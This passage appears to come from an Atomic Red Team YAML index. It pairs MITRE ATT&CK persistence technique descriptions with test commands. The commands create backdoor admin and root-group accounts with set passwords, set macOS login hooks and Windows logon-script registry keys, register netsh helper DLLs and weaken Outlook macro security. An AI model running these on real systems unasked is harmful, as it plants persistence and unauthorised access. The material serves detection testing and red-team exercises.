#{username} + +' + name: bash + elevation_required: true + - name: Create a user account on a MacOS system + auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' + description: 'Creates a user on a MacOS system with dscl + +' + supported_platforms: + - macos + input_arguments: + username: + description: Username of the user to create + type: String + default: evil_user + realname: + description: "'realname' to record when creating the user" + type: String + default: Evil Account + executor: + command: | + dscl . -create /Users/#{username} + dscl . -create /Users/#{username} UserShell /bin/zsh + dscl . -create /Users/#{username} RealName "#{realname}" + dscl . -create /Users/#{username} UniqueID "1010" + dscl . -create /Users/#{username} PrimaryGroupID 80 + dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} + cleanup_command: 'dscl . -delete /Users/#{username} + +' + name: bash + elevation_required: true + - name: Create a new user in a command prompt + auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f + description: | + Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_CMD + password: + description: Password of the user to create + type: String + default: T1136.001_CMD! + executor: + command: 'net user /add "#{username}" "#{password}" + +' + cleanup_command: 'net user /del "#{username}" >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Create a new user in PowerShell + auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + description: | + Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_PowerShell + executor: + command: 'New-LocalUser -Name "#{username}" -NoPassword + +' + cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Create a new user in Linux with `root` UID and GID. + auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c + description: 'Creates a new user in Linux and adds the user to the `root` group. + This technique was used by adversaries during the Butter attack campaign. + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: butter + password: + description: Password of the user to create + type: String + default: BetterWithButter + executor: + command: | + useradd -g 0 -M -d /root -s /bin/bash #{username} + if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; + cleanup_command: 'userdel #{username} + +' + name: bash + elevation_required: true + - name: Create a new Windows admin user + auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 + description: 'Creates a new admin user in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_Admin + password: + description: Password of the user to create + type: String + default: T1136_pass + executor: + command: | + net user /add "#{username}" "#{password}" + net localgroup administrators "#{username}" /add + cleanup_command: 'net user /del "#{username}" >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1078.003: + technique: + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + description: "Adversaries may obtain and abuse credentials of a local account + as a means of gaining Initial Access, Persistence, Privilege Escalation, or + Defense Evasion. Local accounts are those configured by an organization for + use by users, remote support, services, or for administration on a single + system or service.\n\nLocal Accounts may also be abused to elevate privileges + and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). + Password reuse may allow the abuse of local accounts across a set of machines + on a network for the purposes of Privilege Escalation and Lateral Movement. " + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T12:51:00.663Z' + created: '2020-03-13T20:26:46.695Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true + T1037.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.002 + url: https://attack.mitre.org/techniques/T1037/002 + - url: https://support.apple.com/de-at/HT2420 + description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved + July 17, 2017.' + source_name: creating login hook + - source_name: S1 macOs Persistence + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved + March 27, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Logon Script (Mac) + description: "Adversaries may use macOS logon scripts automatically executed + at logon initialization to establish persistence. macOS allows logon scripts + (known as login hooks) to be executed whenever a specific user logs into a + system. A login hook tells Mac OS X to execute a certain script when a user + logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), + a login hook executes as the elevated root user.(Citation: creating login + hook)\n\nAdversaries may use these login hooks to maintain persistence on + a single system.(Citation: S1 macOs Persistence) Access to login hook scripts + may allow an adversary to insert additional malicious code. There can only + be one login hook at a time though and depending on the access configuration + of the hooks, either local credentials or an administrator account may be + necessary. " + id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-27T16:49:15.786Z' + created: '2020-01-10T16:01:15.995Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - macOS + identifier: T1037.002 + atomic_tests: + - name: Logon Scripts - Mac + auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + description: 'Mac logon script + +' + supported_platforms: + - macos + executor: + steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. + Populate the plist with the location of your shell script\n\n sudo defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. + Create the required plist file in the target user's Preferences directory\n\n\t + \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. + Populate the plist with the location of your shell script\n\n\t defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" + name: manual + T1037.001: + technique: + id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 + description: "Adversaries may use Windows logon scripts automatically executed + at logon initialization to establish persistence. Windows allows logon scripts + to be run whenever a specific user or group of users log into a system.(Citation: + TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript + Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these + scripts to maintain persistence on a single system. Depending on the access + configuration of the logon scripts, either local credentials or an administrator + account may be necessary. " + name: Logon Script (Windows) + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.001 + url: https://attack.mitre.org/techniques/T1037/001 + - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx + description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved + April 27, 2016. + source_name: TechNet Logon Scripts + - source_name: Hexacorn Logon Scripts + url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ + description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part + 18. Retrieved November 15, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:03.153Z' + created: '2020-01-10T03:43:37.211Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. + + Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.001 + atomic_tests: + - name: Logon Scripts + auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + description: | + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + that can be viewed in the Registry Editor. + supported_platforms: + - windows + input_arguments: + script_path: + description: Path to .bat file + type: String + default: "%temp%\\art.bat" + script_command: + description: Command To Execute + type: String + default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt + executor: + command: | + echo "#{script_command}" > #{script_path} + REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f + cleanup_command: | + REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 + del #{script_path} >nul 2>&1 + del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 + name: command_prompt + T1556: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556 + url: https://attack.mitre.org/techniques/T1556 + - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ + description: Bialek, J. (2013, September 15). Intercepting Password Changes + With Function Hooking. Retrieved November 21, 2017. + source_name: Clymb3r Function Hook Passwords Sept 2013 + - source_name: Dell Skeleton + description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. + Retrieved April 8, 2019. + url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Modify Authentication Process + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. + id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' + created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain + controller and/or local computer. Monitor for changes to Registry entries + for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification + Packages) and correlate then investigate the DLL files these files + reference. \n\nPassword filters will also show up as an autorun and loaded + DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor + for calls to OpenProcess that can be used to manipulate lsass.exe + running on a domain controller as well as for malicious modifications to functions + exported from authentication-related system DLLs (such as cryptdll.dll and + samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module + paths (ex: /etc/pam.d/) for changes. Use system-integrity tools + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. + (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - macOS + - Network + atomic_tests: [] + T1546.007: + technique: + created: '2020-01-24T14:26:51.207Z' + modified: '2020-03-24T18:28:07.793Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed + description: |- + Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. + + Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) + name: Netsh Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.007 + url: https://attack.mitre.org/techniques/T1546/007 + - url: https://technet.microsoft.com/library/bb490939.aspx + description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. + source_name: TechNet Netsh + - url: https://github.com/outflankbv/NetshHelperBeacon + description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved + February 13, 2017. + source_name: Github Netsh Helper CS Beacon + - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL + DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. + source_name: Demaske Netsh Persistence + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes + in most environments. Monitor process executions and investigate any child + processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh + registry key for any new or suspicious entries that do not correlate with + known system files or benign software. (Citation: Demaske Netsh Persistence)' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.007 + atomic_tests: + - name: Netsh Helper DLL Registration + auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + description: 'Netsh interacts with other operating system components using dynamic-link + library (DLL) files + +' + supported_platforms: + - windows + input_arguments: + helper_file: + description: Path to DLL + type: Path + default: C:\Path\file.dll + executor: + command: 'netsh.exe add helper #{helper_file} + +' + name: command_prompt + T1556.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.004 + url: https://attack.mitre.org/techniques/T1556/004 + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. + + [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) + name: Network Device Authentication + id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' + created: '2020-10-19T17:58:04.155Z' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). + x_mitre_data_sources: + - 'File: File Modification' + x_mitre_platforms: + - Network + atomic_tests: [] + T1037.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.003 + url: https://attack.mitre.org/techniques/T1037/003 + - source_name: Petri Logon Script AD + url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 + description: Daniel Petri. (2009, January 8). Setting up a Logon Script through + Active Directory Users and Computers in Windows Server 2008. Retrieved November + 15, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Logon Script + description: "Adversaries may use network logon scripts automatically executed + at logon initialization to establish persistence. Network logon scripts can + be assigned using Active Directory or Group Policy Objects.(Citation: Petri + Logon Script AD) These logon scripts run with the privileges of the user they + are assigned to. Depending on the systems within the network, initializing + one of these scripts could apply to more than one or potentially all systems. + \ \n \nAdversaries may use these scripts to maintain persistence on a network. + Depending on the access configuration of the logon scripts, either local credentials + or an administrator account may be necessary." + id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:25.625Z' + created: '2020-01-10T18:01:03.666Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1137: + technique: + created: '2017-12-14T16:46:06.044Z' + modified: '2020-06-25T17:48:09.417Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1137 + url: https://attack.mitre.org/techniques/T1137 + - source_name: SensePost Ruler GitHub + url: https://github.com/sensepost/ruler + description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange + services. Retrieved February 4, 2019.' + - source_name: TechNet O365 Outlook Rules + url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/ + description: Koeller, B.. (2018, February 21). Defending Against Rules and + Forms Injection. Retrieved November 5, 2019. + - source_name: CrowdStrike Outlook Forms + url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 + description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral + Movement and Persistence. Retrieved February 5, 2019. + - source_name: Outlook Today Home Page + url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 + description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. + Retrieved February 5, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + description: |- + Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. + + A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) + name: Office Application Startup + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53 + x_mitre_is_subtechnique: false + x_mitre_version: '1.2' + x_mitre_contributors: + - Nick Carr, FireEye + - Microsoft Threat Intelligence Center (MSTIC) + - Sahar Shukrun + - Praetorian + - Loic Jaquemet + - Ricardo Dias + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Application Log: Application Log Content' + x_mitre_detection: |- + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. + + Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) + + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + x_mitre_permissions_required: + - User + - Administrator + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137 + atomic_tests: + - name: Office Application Startup - Outlook as a C2 + auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + description: "As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ + \nit is possible to use Outlook Macro as a way to achieve persistance and + execute arbitrary commands. This transform Outlook into a C2.\nToo achieve + this two things must happened on the syste\n- The macro security registry + value must be set to '4'\n- A file called VbaProject.OTM must be created in + the Outlook Folder.\n" + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 + if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + del %APPDATA%\Microsoft\Outlook\VbaProject.OTM + name: command_prompt + T1137.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.001 + url: https://attack.mitre.org/techniques/T1137/001 + - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea + description: Microsoft. (n.d.). Change the Normal template (Normal.dotm). + Retrieved July 3, 2017. + source_name: Microsoft Change Normal Template + - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office + description: Austin, J. (2017, June 6). Getting Started with VBA in Office. + Retrieved July 3, 2017. + source_name: MSDN VBA in Office + - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/ + description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. + Retrieved July 3, 2017. + source_name: enigma0x3 normal.dotm + - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/ + description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. + Retrieved July 3, 2017. + source_name: Hexacorn Office Template Macros + - source_name: GlobalDotName Jun 2019 + url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique + description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName + - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. + - source_name: CrowdStrike Outlook Forms + url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 + description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral + Movement and Persistence. Retrieved February 5, 2019. + - source_name: Outlook Today Home Page + url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 + description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. + Retrieved February 5, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Office Template Macros + description: "Adversaries may abuse Microsoft Office templates to obtain persistence + on a compromised system. Microsoft Office contains templates that are part + of common Office applications and are used to customize styles. The base templates + within the application are used each time an application starts. (Citation: + Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications + (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base + template and used to execute code when the respective Office application starts + in order to obtain persistence. Examples for both Word and Excel have been + discovered and published. By default, Word has a Normal.dotm template created + that can be modified to include a malicious macro. Excel does not have a template + file created by default, but one can be added that will automatically be loaded.(Citation: + enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates + may also be stored and pulled from remote locations.(Citation: GlobalDotName + Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel + Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries + may also change the location of the base template to point to their own by + hijacking the application's search order, e.g. Word 2016 will first look for + Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, + or by modifying the GlobalDotName registry key. By modifying the GlobalDotName + registry key an adversary can specify an arbitrary location, file name, and + file extension to use for the template that will be loaded on application + startup. To abuse GlobalDotName, adversaries may first need to register the + template as a trusted document or place it in a trusted location.(Citation: + GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute + unrestricted depending on the system or enterprise security policy on use + of macros." + id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-06-25T17:48:08.916Z' + created: '2019-11-07T20:29:17.788Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - Administrator + 